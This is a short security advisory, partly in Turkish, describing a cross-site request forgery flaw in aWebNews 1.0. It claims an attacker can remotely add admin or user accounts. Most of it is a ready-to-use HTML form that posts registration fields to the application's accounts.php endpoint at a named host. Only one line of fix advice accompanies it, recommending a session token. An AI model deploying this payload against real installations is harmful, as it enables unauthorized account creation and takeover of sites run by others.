< ------------------- header data start ------------------- >

#############################################################

# Application Name :aWebNews

# Version : 1.0

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin veya user eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form method=post action=http://labs.aweb.com.au/aWebNews/accounts.php?d=newa&b=skyreg>
Full Name:<br><input type=text name=fullname><br> username:<br><input type=text name=username><br> password:<br><input type=password name=password1><br> Retype password:<br><input type=password name=password2><br> E-mail Address:<br><input type=text name=emailadd><br> <input type=reset value=Clear Form> <input type=submit value=Register>
</form>

< -- bug code end of -- >